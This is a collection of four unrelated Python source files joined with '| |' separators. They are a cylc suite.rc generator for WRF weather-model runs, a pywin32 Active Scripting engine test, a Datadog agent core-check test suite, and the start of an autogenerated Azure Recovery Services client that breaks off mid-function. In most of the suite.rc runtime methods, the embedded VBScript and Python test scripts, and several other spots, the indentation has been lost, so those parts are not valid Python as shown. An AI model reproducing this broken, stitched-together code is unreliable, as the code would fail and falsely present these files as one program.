        Builds the [scheduling] section: an initial-cycle-point graph plus
        repeating cycles for the WRF run interval and the WPS interval.
        '''
        # get start_hour and increment time from config.json
        start_hour = str(
            utils.return_validate
            (self.config['options_general']['date_start']).hour).zfill(2)
        # check if we need to add upp (postprocessing step is optional)
        try:
            if self.config['options_upp']['upp']:
                uppBlock = "=> upp"
            else:
                uppBlock = ""
        except KeyError:
            # 'options_upp' section absent entirely: no postprocessing.
            uppBlock = ""
        # define template
        template = """[scheduling]
initial cycle point = {{{{ START }}}}
final cycle point = {{{{ STOP }}}}
[[dependencies]]
# Initial cycle point
[[[R1]]]
graph = \"\"\"
wrf_init => wps => wrf_real => wrfda => wrf_run {upp}
obsproc_init => obsproc_run => wrfda
\"\"\"
# Repeat every {incr_hour} hours, starting {incr_hour} hours
# after initial cylce point
[[[+PT{incr_hour}H/PT{incr_hour}H]]]
graph = \"\"\"
wrf_run[-PT{incr_hour}H] => wrf_init => wrf_real => wrfda => wrf_run {upp}
wrfda[-PT{incr_hour}H] => obsproc_init => obsproc_run => wrfda
\"\"\"
# Repeat every {wps_incr_hour} hours, starting {wps_incr_hour} hours
# after initial cylce point
[[[+PT{wps_incr_hour}H/PT{wps_incr_hour}H]]]
graph = \"\"\"
wps[-PT{wps_incr_hour}H] => wps => wrf_init
\"\"\"
"""
        # context variables in template
        context = {
            "start_hour": start_hour,
            "incr_hour": self.incr_hour,
            "wps_incr_hour": self.wps_interval_hours,
            "upp": uppBlock
        }
        return template.format(**context)
def _runtime(self):
'''
define suite.rc runtime information
'''
return (self._runtime_base() + self._runtime_init_wrf() +
self._runtime_init_obsproc() + self._runtime_real() +
self._runtime_wrf() + self._runtime_obsproc() +
self._runtime_wrfda() + self._runtime_upp() +
self._runtime_wps())
def _runtime_base(self):
'''
define suite.rc runtime information: base
'''
# define template
template = """[runtime]
[[root]] # suite defaults
[[[job submission]]]
method = background
"""
# context variables in template
context = {}
return template.format(**context)
def _runtime_init_wrf(self):
'''
define suite.rc runtime information: init
'''
init_command = "wrf_init.py $CYLC_TASK_CYCLE_POINT {incr_hour}"
init_context = {
"incr_hour": self.incr_hour
}
init = init_command.format(**init_context)
# define template
template = """
[[wrf_init]]
script = \"\"\"
{wrf_init}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"wrf_init": init,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_init_obsproc(self):
'''
define suite.rc runtime information: init
'''
init = "wrfda_obsproc_init.py $CYLC_TASK_CYCLE_POINT"
# define template
template = """
[[obsproc_init]]
script = \"\"\"
{obsproc_init}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"obsproc_init": init,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_real(self):
'''
define suite.rc runtime information: real.exe
'''
wrf_real = "run_real.py"
# define template
template = """
[[wrf_real]]
script = \"\"\"
{wrf_real}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"wrf_real": wrf_real,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_wrf(self):
'''
define suite.rc runtime information: wrf.exe
'''
wrf_run = "run_wrf.py"
# define template
template = """
[[wrf_run]]
script = \"\"\"
{wrf_run}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"wrf_run": wrf_run,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_obsproc(self):
'''
define suite.rc runtime information: obsproc.exe
'''
obsproc_run = "wrfda_obsproc_run.py $CYLC_TASK_CYCLE_POINT"
# define template
template = """
[[obsproc_run]]
script = \"\"\"
{obsproc_run}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"obsproc_run": obsproc_run,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_wrfda(self):
'''
define suite.rc runtime information: wrfda
'''
wrfda_run = "wrfda_run.py $CYLC_TASK_CYCLE_POINT"
# define template
template = """
[[wrfda]]
script = \"\"\"
{wrfda_run}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"wrfda_run": wrfda_run,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_upp(self):
'''
define suite.rc runtime information: wrfda
'''
# define template
template = """
[[upp]]
script = \"\"\"
{command}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}
"""
command = "upp.py $CYLC_TASK_CYCLE_POINT"
context = {
"command": command,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_wps(self):
'''
define suite.rc runtime information: wrfda
'''
# define template
template = """
[[wps]]
pre-script = \"\"\"
{pre_command}
\"\"\"
script = \"\"\"
{command}
\"\"\"
post-script = \"\"\"
{post_command}
\"\"\"
[[[environment]]]
WORKDIR = {wps_workdir}
CYLC_TASK_WORK_DIR = $WORKDIR
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}
"""
pre_command = "wps_init.py $CYLC_TASK_CYCLE_POINT {wps_run_hours}"
pre_command_context = {
"wps_run_hours": self.wps_interval_hours,
}
command = "wps_run.py"
command_context = {
"wps_dir": self.config['filesystem']['wps_dir']
}
post_command = "wps_post.py"
context = {
"wps_workdir": os.path.join(self.config['filesystem']['work_dir'],
'wps'),
"pre_command": pre_command.format(**pre_command_context),
"command": command.format(**command_context),
"post_command": post_command,
"method": "background",
"directives": ""
}
return template.format(**context)
def _visualization(self):
'''
define suite.rc visualization information
'''
# define template
template = """
[visualization]
initial cycle point = {{ START }}
final cycle point = {{ STOP }}
default node attributes = "style=filled", "fillcolor=grey"
"""
return template
def _write(self, suiterc, filename):
'''
write cylc suite.rc config to file
'''
# create the itag file and write content to it based on the template
try:
with open(filename, 'w') as itag:
itag.write(suiterc)
except IOError:
raise # re-raise exception
| |
import sys
import pythoncom
from win32com.axscript.server.error import Exception
from win32com.axscript import axscript
from win32com.axscript.server import axsite
from win32com.server import util, connect
import win32com.server.policy
from win32com.client.dynamic import Dispatch
from win32com.server.exception import COMException
import unittest
import win32com.test.util
verbose = "-v" in sys.argv
class MySite(axsite.AXSite):
    # Scripting host site that records the last script error so tests can
    # assert on it; prints diagnostics only when running with -v.
    def __init__(self, *args):
        # Exception info tuple of the last script error (None until one occurs).
        self.exception_seen = None
        axsite.AXSite.__init__(self, *args)
    def OnScriptError(self, error):
        # Engine callback; 'error' exposes GetExceptionInfo/GetSourcePosition.
        self.exception_seen = exc = error.GetExceptionInfo()
        context, line, char = error.GetSourcePosition()
        if not verbose:
            return
        print(" >Exception:", exc[1])
        # Source line text may be unavailable for some errors.
        try:
            st = error.GetSourceLineText()
        except pythoncom.com_error:
            st = None
        if st is None: st = ""
        # Point a caret at the failing column, then append the description.
        text = st + "\n" + (" " * (char-1)) + "^" + "\n" + exc[2]
        for line in text.splitlines():
            print(" >" + line)
class MyCollection(util.Collection):
    # Thin subclass used by the tests; delegates enumeration straight to the
    # base Collection implementation.
    def _NewEnum(self):
        return util.Collection._NewEnum(self)
class Test:
    """COM object exposed to the scripts under the name 'test'."""
    _public_methods_ = [ 'echo', 'fail' ]
    _public_attrs_ = ['collection']

    def __init__(self):
        self.verbose = verbose
        self.collection = util.wrap( MyCollection( [1,'Two',3] ))
        self.last = ""
        self.fail_called = 0
        # self._connect_server_ = TestConnectServer(self)

    def echo(self, *args):
        # Remember the concatenated arguments so tests can assert on them.
        self.last = "".join(str(item) for item in args)
        if not self.verbose:
            return
        for item in args:
            print(item, end=' ')
        print()

    def fail(self, *args):
        # Scripts call this to flag a failure; record that it happened.
        print("**** fail() called ***")
        for item in args:
            print(item, end=' ')
        print()
        self.fail_called = 1
        # self._connect_server_.Broadcast(last)
#### Connections currently wont work, as there is no way for the engine to
#### know what events we support. We need typeinfo support.
# Event-interface IID for the (currently unused) connection-point server.
IID_ITestEvents = pythoncom.MakeIID("{8EB72F90-0D44-11d1-9C4B-00AA00125A98}")
class TestConnectServer(connect.ConnectableServer):
    # Connection-point server that would broadcast 'DoneIt' events
    # (dispid 1000) to connected sinks; see the note above about typeinfo.
    _connect_interfaces_ = [IID_ITestEvents]
    # The single public method that the client can call on us
    # (ie, as a normal COM server, this exposes just this single method.
    def __init__(self, object):
        # The Test object whose events we would forward.
        self.object = object
    def Broadcast(self,arg):
        # Simply broadcast a notification.
        self._BroadcastNotify(self.NotifyDoneIt, (arg,))
    def NotifyDoneIt(self, interface, arg):
        # Invoke dispid 1000 (DISPATCH_METHOD) on each connected sink.
        interface.Invoke(1000, 0, pythoncom.DISPATCH_METHOD, 1, arg)
VBScript = """\
prop = "Property Value"
sub hello(arg1)
test.echo arg1
end sub
sub testcollection
if test.collection.Item(0) <> 1 then
test.fail("Index 0 was wrong")
end if
if test.collection.Item(1) <> "Two" then
test.fail("Index 1 was wrong")
end if
if test.collection.Item(2) <> 3 then
test.fail("Index 2 was wrong")
end if
num = 0
for each item in test.collection
num = num + 1
next
if num <> 3 then
test.fail("Collection didn't have 3 items")
end if
end sub
"""
PyScript = """\
# A unicode \xa9omment.
prop = "Property Value"
def hello(arg1):
test.echo(arg1)
def testcollection():
# test.collection[1] = "New one"
got = []
for item in test.collection:
got.append(item)
if got != [1, "Two", 3]:
test.fail("Didn't get the collection")
pass
"""
# XXX - needs py3k work! Throwing a bytes string with an extended char
# doesn't make much sense, but py2x allows it. What it gets upset with
# is a real unicode arg - which is the only thing py3k allows!
PyScript_Exc = """\
def hello(arg1):
raise RuntimeError("exc with extended \xa9har")
"""
ErrScript = """\
bad code for everyone!
"""
# Human-readable names for the Active Scripting engine states, used when
# _CheckEngineState reports an unexpected state.
state_map = {
    axscript.SCRIPTSTATE_UNINITIALIZED: "SCRIPTSTATE_UNINITIALIZED",
    axscript.SCRIPTSTATE_INITIALIZED: "SCRIPTSTATE_INITIALIZED",
    axscript.SCRIPTSTATE_STARTED: "SCRIPTSTATE_STARTED",
    axscript.SCRIPTSTATE_CONNECTED: "SCRIPTSTATE_CONNECTED",
    axscript.SCRIPTSTATE_DISCONNECTED: "SCRIPTSTATE_DISCONNECTED",
    axscript.SCRIPTSTATE_CLOSED: "SCRIPTSTATE_CLOSED",
}
def _CheckEngineState(engine, name, state):
got = engine.engine.eScript.GetScriptState()
if got != state:
got_name = state_map.get(got, str(got))
state_name = state_map.get(state, str(state))
raise RuntimeError("Warning - engine %s has state %s, but expected %s" % (name, got_name, state_name))
class EngineTester(win32com.test.util.TestCase):
    # Drives a script engine end-to-end: load code, call into it via
    # IDispatch, evaluate an expression, then walk the state transitions.
    def _TestEngine(self, engineName, code, expected_exc = None):
        # 'echoer' is exposed to the script as the global 'test' object.
        echoer = Test()
        model = {
            'test' : util.wrap(echoer),
        }
        site = MySite(model)
        engine = site._AddEngine(engineName)
        try:
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
            engine.AddCode(code)
            engine.Start()
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_STARTED)
            self.failUnless(not echoer.fail_called, "Fail should not have been called")
            # Now call into the scripts IDispatch
            ob = Dispatch(engine.GetScriptDispatch())
            try:
                ob.hello("Goober")
                self.failUnless(expected_exc is None,
                                "Expected %r, but no exception seen" % (expected_exc,))
            except pythoncom.com_error:
                # Script raised: only OK when the caller expected it and the
                # recorded error description contains the expected text.
                if expected_exc is None:
                    self.fail("Unexpected failure from script code: %s" % (site.exception_seen,))
                if expected_exc not in site.exception_seen[2]:
                    self.fail("Could not find %r in %r" % (expected_exc, site.exception_seen[2]))
                return
            self.assertEqual(echoer.last, "Goober")
            self.assertEqual(str(ob.prop), "Property Value")
            ob.testcollection()
            self.failUnless(not echoer.fail_called, "Fail should not have been called")
            # Now make sure my engines can evaluate stuff.
            result = engine.eParse.ParseScriptText("1+1", None, None, None, 0, 0, axscript.SCRIPTTEXT_ISEXPRESSION)
            self.assertEqual(result, 2)
            # re-initialize to make sure it transitions back to initialized again.
            engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
            engine.Start()
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_STARTED)
            # Transition back to initialized, then through connected too.
            engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
            engine.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_CONNECTED)
            engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
            engine.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_CONNECTED)
            engine.SetScriptState(axscript.SCRIPTSTATE_DISCONNECTED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_DISCONNECTED)
        finally:
            # Always close the engine and drop references so COM objects
            # are released even when an assertion fails.
            engine.Close()
            engine = None
            site = None
    def testVB(self):
        self._TestEngine("VBScript", VBScript)
    def testPython(self):
        self._TestEngine("Python", PyScript)
    def testPythonUnicodeError(self):
        # NOTE(review): runs plain PyScript, identical to testPython — looks
        # like it was meant to use PyScript_Exc; confirm before changing.
        self._TestEngine("Python", PyScript)
    def testVBExceptions(self):
        self.assertRaises(pythoncom.com_error,
                          self._TestEngine, "VBScript", ErrScript)
    def testPythonExceptions(self):
        expected = "RuntimeError: exc with extended \xa9har"
        self._TestEngine("Python", PyScript_Exc, expected)
if __name__ == '__main__':
unittest.main()
| |
# stdlib
import logging
import os
import time
import unittest
# project
from aggregator import MetricsAggregator
from checks import (
AgentCheck,
Check,
CheckException,
Infinity,
UnknownValue,
)
from checks.collector import Collector
from tests.checks.common import load_check
from util import get_hostname
from utils.ntp import NTPUtil
from utils.proxy import get_proxy
logger = logging.getLogger()
class TestCore(unittest.TestCase):
    "Tests to validate the core check logic"
    def setUp(self):
        # Fresh Check with one gauge and one counter metric registered.
        self.c = Check(logger)
        self.c.gauge("test-metric")
        self.c.counter("test-counter")
    def setUpAgentCheck(self):
        # Helper, not a unittest hook: builds an AgentCheck on demand.
        self.ac = AgentCheck('test', {}, {'checksd_hostname': "foo"})
    def test_gauge(self):
        # Gauges keep only the most recent sample.
        self.assertEquals(self.c.is_gauge("test-metric"), True)
        self.assertEquals(self.c.is_counter("test-metric"), False)
        self.c.save_sample("test-metric", 1.0)
        # call twice in a row, should be invariant
        self.assertEquals(self.c.get_sample("test-metric"), 1.0)
        self.assertEquals(self.c.get_sample("test-metric"), 1.0)
        self.assertEquals(self.c.get_sample_with_timestamp("test-metric")[1], 1.0)
        # new value, old one should be gone
        self.c.save_sample("test-metric", 2.0)
        self.assertEquals(self.c.get_sample("test-metric"), 2.0)
        self.assertEquals(len(self.c._sample_store["test-metric"]), 1)
        # with explicit timestamp
        self.c.save_sample("test-metric", 3.0, 1298066183.607717)
        self.assertEquals(self.c.get_sample_with_timestamp("test-metric"), (1298066183.607717, 3.0, None, None))
        # get_samples()
        self.assertEquals(self.c.get_samples(), {"test-metric": 3.0})
    def testEdgeCases(self):
        self.assertRaises(CheckException, self.c.get_sample, "unknown-metric")
        # same value
        self.c.save_sample("test-counter", 1.0, 1.0)
        self.c.save_sample("test-counter", 1.0, 1.0)
        # zero elapsed time between identical counter samples -> Infinity
        self.assertRaises(Infinity, self.c.get_sample, "test-counter")
    def test_counter(self):
        self.c.save_sample("test-counter", 1.0, 1.0)
        # a counter needs two samples before a rate can be computed
        self.assertRaises(UnknownValue, self.c.get_sample, "test-counter", expire=False)
        self.c.save_sample("test-counter", 2.0, 2.0)
        self.assertEquals(self.c.get_sample("test-counter", expire=False), 1.0)
        self.assertEquals(self.c.get_sample_with_timestamp("test-counter", expire=False), (2.0, 1.0, None, None))
        self.assertEquals(self.c.get_samples(expire=False), {"test-counter": 1.0})
        # counter went down (reset): no negative rate may be emitted
        self.c.save_sample("test-counter", -2.0, 3.0)
        self.assertRaises(UnknownValue, self.c.get_sample_with_timestamp, "test-counter")
    def test_tags(self):
        # Test metric tagging
        now = int(time.time())
        # Tag metrics
        self.c.save_sample("test-counter", 1.0, 1.0, tags = ["tag1", "tag2"])
        self.c.save_sample("test-counter", 2.0, 2.0, tags = ["tag1", "tag2"])
        # Only 1 point recording for this combination of tags, won't be sent
        self.c.save_sample("test-counter", 3.0, 3.0, tags = ["tag1", "tag3"])
        self.c.save_sample("test-metric", 3.0, now, tags = ["tag3", "tag4"])
        # Arg checks
        self.assertRaises(CheckException, self.c.save_sample, "test-metric", 4.0, now + 5, tags = "abc")
        # This is a different combination of tags
        self.c.save_sample("test-metric", 3.0, now, tags = ["tag5", "tag3"])
        results = self.c.get_metrics()
        results.sort()
        self.assertEquals(results,
                          [("test-counter", 2.0, 1.0, {"tags": ["tag1", "tag2"]}),
                           ("test-metric", now, 3.0, {"tags": ["tag3", "tag4"]}),
                           ("test-metric", now, 3.0, {"tags": ["tag3", "tag5"]}),
                           ])
        # Tagged metrics are not available through get_samples anymore
        self.assertEquals(self.c.get_samples(), {})
    def test_samples(self):
        self.assertEquals(self.c.get_samples(), {})
        self.c.save_sample("test-metric", 1.0, 0.0)  # value, ts
        self.c.save_sample("test-counter", 1.0, 1.0)  # value, ts
        self.c.save_sample("test-counter", 4.0, 2.0)  # value, ts
        assert "test-metric" in self.c.get_samples_with_timestamps(expire=False), self.c.get_samples_with_timestamps(expire=False)
        self.assertEquals(self.c.get_samples_with_timestamps(expire=False)["test-metric"], (0.0, 1.0, None, None))
        assert "test-counter" in self.c.get_samples_with_timestamps(expire=False), self.c.get_samples_with_timestamps(expire=False)
        self.assertEquals(self.c.get_samples_with_timestamps(expire=False)["test-counter"], (2.0, 3.0, None, None))
    def test_name(self):
        # normalize() sanitizes metric names, optionally adding a prefix.
        self.assertEquals(self.c.normalize("metric"), "metric")
        self.assertEquals(self.c.normalize("metric", "prefix"), "prefix.metric")
        self.assertEquals(self.c.normalize("__metric__", "prefix"), "prefix.metric")
        self.assertEquals(self.c.normalize("abc.metric(a+b+c{}/5)", "prefix"), "prefix.abc.metric_a_b_c_5")
        self.assertEquals(self.c.normalize("VBE.default(127.0.0.1,,8080).happy", "varnish"), "varnish.VBE.default_127.0.0.1_8080.happy")
        # Same tests for the AgentCheck
        self.setUpAgentCheck()
        self.assertEquals(self.ac.normalize("metric"), "metric")
        self.assertEquals(self.ac.normalize("metric", "prefix"), "prefix.metric")
        self.assertEquals(self.ac.normalize("__metric__", "prefix"), "prefix.metric")
        self.assertEquals(self.ac.normalize("abc.metric(a+b+c{}/5)", "prefix"), "prefix.abc.metric_a_b_c_5")
        self.assertEquals(self.ac.normalize("VBE.default(127.0.0.1,,8080).happy", "varnish"), "varnish.VBE.default_127.0.0.1_8080.happy")
        # fix_case also converts camelCase segments to snake_case
        self.assertEqual(self.ac.normalize("PauseTotalNs", "prefix", fix_case = True), "prefix.pause_total_ns")
        self.assertEqual(self.ac.normalize("Metric.wordThatShouldBeSeparated", "prefix", fix_case = True), "prefix.metric.word_that_should_be_separated")
    def test_service_check(self):
        check_name = 'test.service_check'
        status = AgentCheck.CRITICAL
        tags = ['host:test', 'other:thing']
        host_name = 'foohost'
        timestamp = time.time()
        check = AgentCheck('test', {}, {'checksd_hostname':'foo'})
        check.service_check(check_name, status, tags, timestamp, host_name)
        self.assertEquals(len(check.service_checks), 1, check.service_checks)
        val = check.get_service_checks()
        self.assertEquals(len(val), 1)
        # the run id is generated, so fetch it before comparing the payload
        check_run_id = val[0].get('id', None)
        self.assertNotEquals(check_run_id, None)
        self.assertEquals([{
            'id': check_run_id,
            'check': check_name,
            'status': status,
            'host_name': host_name,
            'tags': tags,
            'timestamp': timestamp,
            'message': None,
        }], val)
        # get_service_checks() flushes the buffer
        self.assertEquals(len(check.service_checks), 0, check.service_checks)
    def test_collector(self):
        # NOTE(review): needs a local Redis listening on 6379 — integration,
        # not a pure unit test.
        agentConfig = {
            'api_key': 'test_apikey',
            'check_timings': True,
            'collect_ec2_tags': True,
            'collect_instance_metadata': False,
            'create_dd_check_tags': False,
            'version': 'test',
            'tags': '',
        }
        # Run a single checks.d check as part of the collector.
        redis_config = {
            "init_config": {},
            "instances": [{"host": "localhost", "port": 6379}]
        }
        checks = [load_check('redisdb', redis_config, agentConfig)]
        c = Collector(agentConfig, [], {}, get_hostname(agentConfig))
        payload = c.run({
            'initialized_checks': checks,
            'init_failed_checks': {}
        })
        metrics = payload['metrics']
        # Check that we got a timing metric for all checks.
        timing_metrics = [m for m in metrics
                          if m[0] == 'datadog.agent.check_run_time']
        all_tags = []
        for metric in timing_metrics:
            all_tags.extend(metric[3]['tags'])
        for check in checks:
            tag = "check:%s" % check.name
            assert tag in all_tags, all_tags
    def test_apptags(self):
        '''
        Tests that the app tags are sent if specified so
        '''
        agentConfig = {
            'api_key': 'test_apikey',
            'collect_ec2_tags': False,
            'collect_instance_metadata': False,
            'create_dd_check_tags': True,
            'version': 'test',
            'tags': '',
        }
        # Run a single checks.d check as part of the collector.
        redis_config = {
            "init_config": {},
            "instances": [{"host": "localhost", "port": 6379}]
        }
        checks = [load_check('redisdb', redis_config, agentConfig)]
        c = Collector(agentConfig, [], {}, get_hostname(agentConfig))
        payload = c.run({
            'initialized_checks': checks,
            'init_failed_checks': {}
        })
        # We check that the redis DD_CHECK_TAG is sent in the payload
        self.assertTrue('dd_check:redisdb' in payload['host-tags']['system'])
    def test_no_proxy(self):
        """ Starting with Agent 5.0.0, there should always be a local forwarder
        running and all payloads should go through it. So we should make sure
        that we pass the no_proxy environment variable that will be used by requests
        (See: https://github.com/kennethreitz/requests/pull/945 )
        """
        from requests.utils import get_environ_proxies
        from os import environ as env
        env["http_proxy"] = "http://localhost:3128"
        env["https_proxy"] = env["http_proxy"]
        env["HTTP_PROXY"] = env["http_proxy"]
        env["HTTPS_PROXY"] = env["http_proxy"]
        # no_proxy is expected to have been set by the agent's startup code.
        self.assertTrue("no_proxy" in env)
        self.assertEquals(env["no_proxy"], "127.0.0.1,localhost,169.254.169.254")
        # The local forwarder endpoint must bypass the proxies entirely.
        self.assertEquals({}, get_environ_proxies(
            "http://localhost:17123/intake"))
        expected_proxies = {
            'http': 'http://localhost:3128',
            'https': 'http://localhost:3128',
            'no': '127.0.0.1,localhost,169.254.169.254'
        }
        environ_proxies = get_environ_proxies("https://www.google.com")
        self.assertEquals(expected_proxies, environ_proxies,
                          (expected_proxies, environ_proxies))
        # Clear the env variables set
        del env["http_proxy"]
        del env["https_proxy"]
        if "HTTP_PROXY" in env:
            # on some platforms (e.g. Windows) env var names are case-insensitive, so we have to avoid
            # deleting the same key twice
            del env["HTTP_PROXY"]
            del env["HTTPS_PROXY"]
    def test_get_proxy(self):
        # Explicit agent config wins over environment variables.
        agentConfig = {
            "proxy_host": "localhost",
            "proxy_port": 4242,
            "proxy_user": "foo",
            "proxy_password": "bar"
        }
        proxy_from_config = get_proxy(agentConfig)
        self.assertEqual(proxy_from_config,
                         {
                             "host": "localhost",
                             "port": 4242,
                             "user": "foo",
                             "password": "bar",
                         })
        # Without agent config, fall back to HTTPS_PROXY from the environment.
        # NOTE(review): HTTPS_PROXY is left set after this test — confirm no
        # later test depends on a clean environment.
        os.environ["HTTPS_PROXY"] = "https://fooenv:barenv@google.com:4444"
        proxy_from_env = get_proxy({})
        self.assertEqual(proxy_from_env,
                         {
                             "host": "google.com",
                             "port": 4444,
                             "user": "fooenv",
                             "password": "barenv"
                         })
    def test_min_collection_interval(self):
        config = {'instances': [{}], 'init_config': {}}
        agentConfig = {
            'version': '0.1',
            'api_key': 'toto'
        }
        # default min collection interval for that check was 20sec
        check = load_check('disk', config, agentConfig)
        check.DEFAULT_MIN_COLLECTION_INTERVAL = 20
        check.run()
        metrics = check.get_metrics()
        self.assertTrue(len(metrics) > 0, metrics)
        check.run()
        metrics = check.get_metrics()
        # No metrics should be collected as it's too early
        self.assertEquals(len(metrics), 0, metrics)
        # equivalent to time.sleep(20)
        check.last_collection_time[0] -= 20
        check.run()
        metrics = check.get_metrics()
        self.assertTrue(len(metrics) > 0, metrics)
        # 3s is still below the 20s default interval: nothing collected
        check.last_collection_time[0] -= 3
        check.run()
        metrics = check.get_metrics()
        self.assertEquals(len(metrics), 0, metrics)
        # interval 0 disables throttling: every run collects
        check.DEFAULT_MIN_COLLECTION_INTERVAL = 0
        check.run()
        metrics = check.get_metrics()
        self.assertTrue(len(metrics) > 0, metrics)
        # per-instance min_collection_interval overrides the default
        config = {'instances': [{'min_collection_interval':3}], 'init_config': {}}
        check = load_check('disk', config, agentConfig)
        check.run()
        metrics = check.get_metrics()
        self.assertTrue(len(metrics) > 0, metrics)
        check.run()
        metrics = check.get_metrics()
        self.assertEquals(len(metrics), 0, metrics)
        check.last_collection_time[0] -= 4
        check.run()
        metrics = check.get_metrics()
        self.assertTrue(len(metrics) > 0, metrics)
        # instance-level setting (12) takes precedence over init_config (3)
        config = {'instances': [{'min_collection_interval': 12}], 'init_config': {'min_collection_interval':3}}
        check = load_check('disk', config, agentConfig)
        check.run()
        metrics = check.get_metrics()
        self.assertTrue(len(metrics) > 0, metrics)
        check.run()
        metrics = check.get_metrics()
        self.assertEquals(len(metrics), 0, metrics)
        check.last_collection_time[0] -= 4
        check.run()
        metrics = check.get_metrics()
        self.assertEquals(len(metrics), 0, metrics)
        check.last_collection_time[0] -= 8
        check.run()
        metrics = check.get_metrics()
        self.assertTrue(len(metrics) > 0, metrics)
    def test_ntp_global_settings(self):
        # Clear any existing ntp config
        NTPUtil._drop()
        config = {'instances': [{
            "host": "foo.com",
            "port": "bar",
            "version": 42,
            "timeout": 13.37}],
            'init_config': {}}
        agentConfig = {
            'version': '0.1',
            'api_key': 'toto'
        }
        # load this config in the ntp singleton
        ntp_util = NTPUtil(config)
        # default min collection interval for that check was 20sec
        check = load_check('ntp', config, agentConfig)
        check.run()
        # The singleton must have picked up the instance-level settings.
        self.assertEqual(ntp_util.args["host"], "foo.com")
        self.assertEqual(ntp_util.args["port"], "bar")
        self.assertEqual(ntp_util.args["version"], 42)
        self.assertEqual(ntp_util.args["timeout"], 13.37)
        # Clear the singleton to prepare for next config
        NTPUtil._drop()
        config = {'instances': [{}], 'init_config': {}}
        agentConfig = {
            'version': '0.1',
            'api_key': 'toto'
        }
        # load the new config
        ntp_util = NTPUtil(config)
        # default min collection interval for that check was 20sec
        check = load_check('ntp', config, agentConfig)
        try:
            check.run()
        except Exception:
            # the check may fail without network access; we only assert on
            # the defaults the singleton falls back to
            pass
        self.assertTrue(ntp_util.args["host"].endswith("datadog.pool.ntp.org"))
        self.assertEqual(ntp_util.args["port"], "ntp")
        self.assertEqual(ntp_util.args["version"], 3)
        self.assertEqual(ntp_util.args["timeout"], 1.0)
        NTPUtil._drop()
class TestAggregator(unittest.TestCase):
    """Tests for MetricsAggregator tag handling."""
    def setUp(self):
        self.aggr = MetricsAggregator('test-aggr')
    def test_dupe_tags(self):
        # Duplicate tags on a sample must collapse to the same context,
        # so both increments land on a single metric.
        self.aggr.increment('test-counter', 1, tags=['a', 'b'])
        self.aggr.increment('test-counter', 1, tags=['a', 'b', 'b'])
        self.assertEquals(len(self.aggr.metrics), 1, self.aggr.metrics)
        # list(...) so this also works on Python 3, where dict.values()
        # returns a non-subscriptable view.
        metric = list(self.aggr.metrics.values())[0]
        self.assertEquals(metric.value, 2)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_get_request(
    vault_name: str,
    resource_group_name: str,
    subscription_id: str,
    fabric_name: str,
    container_name: str,
    **kwargs: Any
) -> HttpRequest:
    """Build an HTTP GET request that fetches a protection container."""
    api_version = "2021-12-01"
    accept = "application/json"

    # Resolve the URL template and substitute the path parameters.
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}')
    url = _format_url_section(
        url,
        vaultName=_SERIALIZER.url("vault_name", vault_name, 'str'),
        resourceGroupName=_SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        subscriptionId=_SERIALIZER.url("subscription_id", subscription_id, 'str'),
        fabricName=_SERIALIZER.url("fabric_name", fabric_name, 'str'),
        containerName=_SERIALIZER.url("container_name", container_name, 'str'),
    )

    # Query string.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=params,
        headers=headers,
        **kwargs
    )
def build_register_request(
    vault_name: str,
